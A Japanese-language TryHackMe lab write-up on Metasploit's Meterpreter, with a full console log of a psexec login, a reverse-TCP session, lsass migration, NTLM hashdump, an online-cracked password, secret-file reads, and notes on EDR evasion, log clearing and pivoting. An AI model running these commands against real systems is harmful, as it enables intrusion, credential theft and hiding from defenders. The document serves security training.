はじめに
Meterpreter は Metasploit の強力なペイロードで、侵入後(ポストエクスプロイト)に必要な操作を“エージェント”として提供する。ディスクに常駐せず RAM 上で動作し、C2(攻撃側)との通信は暗号化されるため、検知回避性が高い。多様な OS・実行環境に対応した“フレーバー”が用意され、組み込みコマンド/拡張モジュール(例: kiwi, python)で調査・権限昇格・横展開を効率化する。
1. Meterpreter の仕組み
-
メモリ常駐: 実体ファイル(例:
meterpreter.exe)をディスクに落とさず RAM 上で動作。多くの AV が行う「新規ファイルスキャン」を回避しやすい。 - 暗号化通信: 既定で TLS による暗号化チャネルを確立。組織が TLS 復号+検査を実施していなければ、NIDS/NIPS による検出は難しくなる。
-
プロセス移行(migrate): 別プロセスに注入して安定性・権限・キーログ取得などを最適化。例:
lsass.exeへ移行して SAM/LSA 抽出に備える。
例:
getpidで現在の PID を確認しても、spoolsv.exe等の正規プロセスとして見える。
meterpreter > getpid
Current pid: 1304
meterpreter > ps
... 1304 spoolsv.exe ...
2. フレーバー(種類)と配布形態
-
配布形態
- Staged(分割): 先に小さな“stager”を送り込み、後続ペイロード本体を取得。ペイロードサイズを抑制。
- Inline / Stageless(単体): 1 ステップで送達し、そのまま実行。
-
対応プラットフォームの例
- Android / iOS / Windows / Linux / macOS / PHP / Python / Java など
- 一覧取得(抜粋)
msfvenom --list payloads | grep meterpreter
android/meterpreter/reverse_https
windows/x64/meterpreter/reverse_tcp
linux/x64/meterpreter_reverse_http
...
-
エクスプロイト側の既定値
モジュールにより既定の Meterpreter が選ばれる(例:ms17_010_eternalblueはwindows/x64/meterpreter/reverse_tcp)。
3. 代表コマンド速覧
コア
-
background/sessions: セッション管理 -
migrate <PID>: プロセス移行 -
load <ext>: 拡張読込(例:load kiwi,load python) -
run/post: Post モジュール実行 -
sysinfo/getuid/getpid: 環境・権限確認
ファイル・ネットワーク・システム
-
ls/cd/cat/upload/download -
ifconfig/netstat/portfwd/route -
ps/kill/shell/reg/clearev
情報取得・操作
-
search -f <pattern>: ファイル探索 -
hashdump: SAM の NTLM ハッシュ抽出(※要権限) -
keyscan_start/stop/dump: キーログ -
screenshot/screenshare/webcam_*/record_mic -
getsystem: 権限昇格トライ -
timestomp: MACE タイムスタンプ改変
すべてのコマンドが常に使えるわけではない(Web カメラ非搭載、権限不足、仮想環境など)。
helpで実行可能コマンドを都度確認。
4. 実践: PSExec での侵入〜ポストエクスプロイト
4.1 初期侵入(認証型 RCE)
TryHackMe 想定環境・資格情報:
exploit/windows/smb/psexec- SMBUser:
ballen/ SMBPass:Password1
msf6 > use exploit/windows/smb/psexec
msf6 exploit(psexec) > set RHOSTS 10.201.104.171
msf6 exploit(psexec) > set SMBUser ballen
msf6 exploit(psexec) > set SMBPass Password1
msf6 exploit(psexec) > run
[*] Meterpreter session 1 opened
sysinfo でホスト情報を確認:
meterpreter > sysinfo
Computer : ACME-TEST
OS : Windows Server 2019 (10.0 Build 17763)
Domain : FLASH
問1: Computer name? →
ACME-TEST
問2: Target domain? →FLASH
4.2 共有資源の列挙(Post モジュール)
メニューに戻して Post を実行:
msf6 > use post/windows/gather/enum_shares
msf6 post(enum_shares) > set session 1
msf6 post(enum_shares) > run
[*] Name: SYSVOL ...
[*] Name: NETLOGON ...
[*] Name: speedster Path: C:\Shares\speedster
問3: ユーザー作成と思しき共有名? →
speedster
4.3 プロセス移行とハッシュ取得
lsass.exe へ移行後、hashdump を実行(PID は ps で確認):
meterpreter > migrate <PID_of_lsass>
meterpreter > hashdump
...
jchambers:1114:...:69596c7aa1e8daee17f8e78870e25a5c:::
問4: jchambers の NTLM ハッシュ?
69596c7aa1e8daee17f8e78870e25a5c
オンライン辞書(例: crackstation)で照合:
問5: jchambers の平文パスワード?
Trustno1
4.4 ファイル探索と機密確認
旗・認証・ヒント等の探索:
meterpreter > search -f secrets.txt
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt
meterpreter > cat "...\secrets.txt"
My Twitter password is KDSvbsw3849!
meterpreter > search -f realsecret.txt
c:\inetpub\wwwroot\realsecret.txt
meterpreter > cat "...\realsecret.txt"
The Flash is the fastest man alive
4.5 後片付け
-
clearevでイベントログの削除(適用可否を要検討) -
sessions -Kなどでセッションの整理・終了
5. 拡張: load で能力を増やす
-
Python 拡張
meterpreter > load python meterpreter > python_execute "print 'TryHackMe Rocks!'" -
Kiwi(Mimikatz)
meterpreter > load kiwi meterpreter > creds_all meterpreter > dcsync_ntlm ...読み込み後は
helpにコマンド群が追加される。
6. 運用上の注意(OPSEC / 実務ベストプラクティス)
- 合法性の確保: 許可のない環境での使用は違法。必ず書面許諾のある範囲で実施。
-
安定性の確保:
migrateはセッションの生存性に直結。更新で再起動されにくいサービス(spoolsv.exeなど)を選ぶ一方、権限低下に注意。 - EDR 回避: 近年はメモリ監視・振る舞い検知が一般的。挙動・ロード順序・遷移先・ I/O パターンを最小化。
-
ロギング対策:
clearevの乱用は痕跡として逆効果になり得る。要件・合意に沿って慎重に。 -
横展開: 抽出した NTLM を使った PtH、
portfwd/routeでのピボット、AD 情報取得(post/windows/gather/*、kiwi dcsync)を段階的に。
まとめ
- Meterpreter は RAM 常駐+TLS 通信で検知回避性を持つポストエクスプロイト基盤。
- Staged / Stageless と 多 OS フレーバーを使い分け、エクスプロイト側の互換性と通信要件で選定。
-
help→コマンド把握→migrate→hashdump/search/screenshot/portfwdの基本動線を押さえる。 -
load kiwi/pythonで機能拡張し、AD・資格情報・自動化に対応。 - 実践演習では、共有列挙(speedster)→ lsass 移行 → jchambers の NTLM 抽出(
69596c7aa1e8daee17f8e78870e25a5c)→ 平文解析(Trustno1)→ 機密ファイル確認の流れを確認した。
Log
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > info
Name: Microsoft Windows Authenticated User Code Execution
Module: exploit/windows/smb/psexec
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 1999-01-01
Provided by:
hdm <x@hdm.io>
Royce Davis <rdavis@accuvant.com>
RageLtMan <rageltman@sempervictus>
Available targets:
Id Name
-- ----
=> 0 Automatic
1 PowerShell
2 Native upload
3 MOF upload
4 Command
Check supported:
No
Basic options:
Name Current Setti Required Description
ng
---- ------------- -------- -----------
SERVICE_DESC no Service descriptio
RIPTION n to be used on ta
rget for pretty li
sting
SERVICE_DISP no The service displa
LAY_NAME y name
SERVICE_NAME no The service name
SMBSHARE no The share to conne
ct to, can be an a
dmin share (ADMIN$
,C$,...) or a norm
al read/write fold
er share
Used when connecting via an existing SESSION:
Name Current Settin Required Description
g
---- -------------- -------- -----------
SESSION no The session to run thi
s module on
Used when making a new connection via RHOSTS:
Name Current Settin Required Description
g
---- -------------- -------- -----------
RHOSTS no The target host(s),
see https://docs.met
asploit.com/docs/usi
ng-metasploit/basics
/using-metasploit.ht
ml
RPORT 445 no The target port (TCP
)
SMBDomain . no The Windows domain t
o use for authentica
tion
SMBPass no The password for the
specified username
SMBUser no The username to auth
enticate as
Payload information:
Space: 3072
Description:
This module uses a valid administrator username and password (or
password hash) to execute an arbitrary payload. This module is similar
to the "psexec" utility provided by SysInternals. This module is now able
to clean up after itself. The service created by this tool uses a randomly
chosen name and description.
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0504
OSVDB (3106)
http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
https://www.optiv.com/blog/owning-computers-without-shell-access
http://sourceforge.net/projects/smbexec/
View the full module info with the info -d command.
msf6 exploit(windows/smb/psexec) >
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.201.104.171
RHOSTS => 10.201.104.171
msf6 exploit(windows/smb/psexec) > set SMBUser ballen
SMBUser => ballen
msf6 exploit(windows/smb/psexec) > set SMBPass Password1
SMBPass => Password1
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.201.53.176:4444
[*] 10.201.104.171:445 - Connecting to the server...
[*] 10.201.104.171:445 - Authenticating to 10.201.104.171:445 as user 'ballen'...
[*] 10.201.104.171:445 - Selecting PowerShell target
[*] 10.201.104.171:445 - Executing the payload...
[+] 10.201.104.171:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (10.201.53.176:4444 -> 10.201.104.171:52202) at 2025-11-01 13:20:46 +0000
meterpreter > sysinfo
Computer : ACME-TEST
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FLASH
Logged On Users : 7
Meterpreter : x86/windows
meterpreter >
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current sessi
on
bg Alias for background
bgkill Kills a background meterprete
r script
bglist Lists running background scri
pts
bgrun Executes a meterpreter script
as a background thread
channel Displays information or contr
ol active channels
close Closes a channel
detach Detach the meterpreter sessio
n (for http/https)
disable_unicode_encoding Disables encoding of unicode
strings
enable_unicode_encoding Enables encoding of unicode s
trings
exit Terminate the meterpreter ses
sion
get_timeouts Get the current session timeo
ut values
guid Get the session GUID
help Help menu
info Displays information about a
Post module
irb Open an interactive Ruby shel
l on the current session
load Load one or more meterpreter
extensions
machine_id Get the MSF ID of the machine
attached to the session
migrate Migrate the server to another
process
pivot Manage pivot listeners
pry Open the Pry debugger on the
current session
quit Terminate the meterpreter ses
sion
read Reads data from a channel
resource Run the commands stored in a
file
run Executes a meterpreter script
or Post module
secure (Re)Negotiate TLV packet encr
yption on the session
sessions Quickly switch to another ses
sion
set_timeouts Set the current session timeo
ut values
sleep Force Meterpreter to go quiet
, then re-establish session
ssl_verify Modify the SSL certificate ve
rification setting
transport Manage the transport mechanis
ms
use Deprecated alias for "load"
uuid Get the UUID for the current
session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file t
o the screen
cd Change directory
checksum Retrieve the checksum of a fi
le
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
(alias for lpwd)
getwd Print working directory
lcat Read the contents of a local
file to the screen
lcd Change local working director
y
ldir List local files (alias for l
ls)
lls List local files
lmkdir Create new directory on local
machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical
drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy con
figuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connectio
ns
portfwd Forward a local port to a rem
ote service
resolve Resolve a set of host names o
n the target
route View and modify the routing t
able
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active imper
sonation token.
execute Execute a command
getenv Get one or more environment v
ariable values
getpid Get the current process ident
ifier
getprivs Attempt to enable all privile
ges available to the current
process
getsid Get the SID of the user that
the server is running as
getuid Get the user that the server
is running as
kill Terminate a process
localtime Displays the target system lo
cal date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the
remote registry
rev2self Calls RevertToSelf() on the r
emote machine
shell Drop into a system command sh
ell
shutdown Shuts down the remote compute
r
steal_token Attempts to steal an imperson
ation token from the target p
rocess
suspend Suspends or resumes a list of
processes
sysinfo Gets information about the re
mote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops
and window stations
getdesktop Get the current meterpreter d
esktop
idletime Returns the number of seconds
the remote user has been idl
e
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop
in real time
screenshot Grab a screenshot of the inte
ractive desktop
setdesktop Change the meterpreters curre
nt desktop
uictl Control some of the user inte
rface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default
microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the spec
ified webcam
webcam_stream Play a video stream from the
specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.
wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privi
lege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM
database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attribut
es
msf6 exploit(windows/smb/psexec) > use post/windows/gather/enum_shares
msf6 post(windows/gather/enum_shares) >
msf6 post(windows/gather/enum_shares) > set session 1
session => 1
msf6 post(windows/gather/enum_shares) > run
[*] Running module against ACME-TEST (10.201.104.171)
[*] The following shares were found:
[*] Name: SYSVOL
[*] Path: C:\Windows\SYSVOL\sysvol
[*] Remark: Logon server share
[*] Type: DISK
[*]
[*] Name: NETLOGON
[*] Path: C:\Windows\SYSVOL\sysvol\FLASH.local\SCRIPTS
[*] Remark: Logon server share
[*] Type: DISK
[*]
[*] Name: speedster
[*] Path: C:\Shares\speedster
[*] Type: DISK
[*]
[*] Post module execution completed
msf6 post(windows/gather/enum_shares) > back
msf6 > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System
Proces
s]
4 0 System x64 0
68 4 Registr x64 0
y
396 4 smss.ex x64 0
e
548 540 csrss.e x64 0
xe
616 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
svchost.ex
e
620 612 csrss.e x64 1
xe
672 540 wininit x64 0
.exe
704 612 winlogo x64 1 NT AUTHORI C:\Windows
n.exe TY\SYSTEM \System32\
winlogon.e
xe
752 672 service x64 0
s.exe
772 672 lsass.e x64 0 NT AUTHORI C:\Windows
xe TY\SYSTEM \System32\
lsass.exe
796 3772 powersh x86 0 NT AUTHORI C:\Windows
ell.exe TY\SYSTEM \SysWOW64\
WindowsPow
erShell\v1
.0\powersh
ell.exe
812 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\LOCAL S \System32\
ERVICE svchost.ex
e
832 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\NETWORK \System32\
SERVICE svchost.ex
e
952 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
svchost.ex
e
964 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\LOCAL S \System32\
ERVICE svchost.ex
e
988 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\NETWORK \System32\
SERVICE svchost.ex
e
1028 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\LOCAL S \System32\
ERVICE svchost.ex
e
1048 704 dwm.exe x64 1 Window Man C:\Windows
ager\DWM-1 \System32\
dwm.exe
1076 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
svchost.ex
e
1136 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\NETWORK \System32\
SERVICE svchost.ex
e
1328 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\LOCAL S \System32\
ERVICE svchost.ex
e
1504 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\LOCAL S \System32\
ERVICE svchost.ex
e
1552 752 msdtc.e x64 0 NT AUTHORI C:\Windows
xe TY\NETWORK \System32\
SERVICE msdtc.exe
1652 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
svchost.ex
e
1736 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
svchost.ex
e
2060 704 fontdrv x64 1 Font Drive C:\Windows
host.ex r Host\UMF \System32\
e D-1 fontdrvhos
t.exe
2068 672 fontdrv x64 0 Font Drive C:\Windows
host.ex r Host\UMF \System32\
e D-0 fontdrvhos
t.exe
2076 752 spoolsv x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
spoolsv.ex
e
2148 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
svchost.ex
e
2168 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\LOCAL S \System32\
ERVICE svchost.ex
e
2232 752 svchost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
svchost.ex
e
2292 752 Microso x64 0 NT AUTHORI C:\Windows
ft.Acti TY\SYSTEM \ADWS\Micr
veDirec osoft.Acti
tory.We veDirector
bServic y.WebServi
es.exe ces.exe
2312 752 ismserv x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
ismserv.ex
e
2340 752 dfsrs.e x64 0 NT AUTHORI C:\Windows
xe TY\SYSTEM \System32\
dfsrs.exe
2352 752 LiteAge x64 0 NT AUTHORI C:\Program
nt.exe TY\SYSTEM Files\Ama
zon\XenToo
ls\LiteAge
nt.exe
2380 752 dfssvc. x64 0 NT AUTHORI C:\Windows
exe TY\SYSTEM \System32\
dfssvc.exe
2404 752 dns.exe x64 0 NT AUTHORI C:\Windows
TY\SYSTEM \System32\
dns.exe
2736 752 vds.exe x64 0 NT AUTHORI C:\Windows
TY\SYSTEM \System32\
vds.exe
2884 952 WmiPrvS x64 0 NT AUTHORI C:\Windows
E.exe TY\SYSTEM \System32\
wbem\WmiPr
vSE.exe
3036 704 LogonUI x64 1 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
LogonUI.ex
e
3144 796 conhost x64 0 NT AUTHORI C:\Windows
.exe TY\SYSTEM \System32\
conhost.ex
meterpreter > migrate 772
[*] Migrating from 2740 to 772...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:0a8053ea4b9545d74a9b4e723f2a2a5f:::
meterpreter >
# use https://crackstation.net/
# 69596c7aa1e8daee17f8e78870e25a5c NTLM Trustno1
meterpreter > search -f secrets.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt 35 2021-07-30 08:44:27 +0100
meterpreter > cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
My Twitter password is KDSvbsw3849!
meterpreter > search -f realsecret.txt
c:\inetpub\wwwroot\realsecret.txt
meterpreter > cat "c:\inetpub\wwwroot\realsecret.txt "
The Flash is the fastest man alive
msf6 exploit(windows/smb/psexec) > sessions -K -S "session_type:meterpreter"
[*] Killing matching sessions...
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x6 NT AUTHORITY\S 10.201.53.176:4
4/windows YSTEM @ ACME-T 444 -> 10.201.1
EST 04.171:52202 (1
0.201.104.171)
[*] 10.201.104.171 - Meterpreter session 1 closed.
msf6 exploit(windows/smb/psexec) >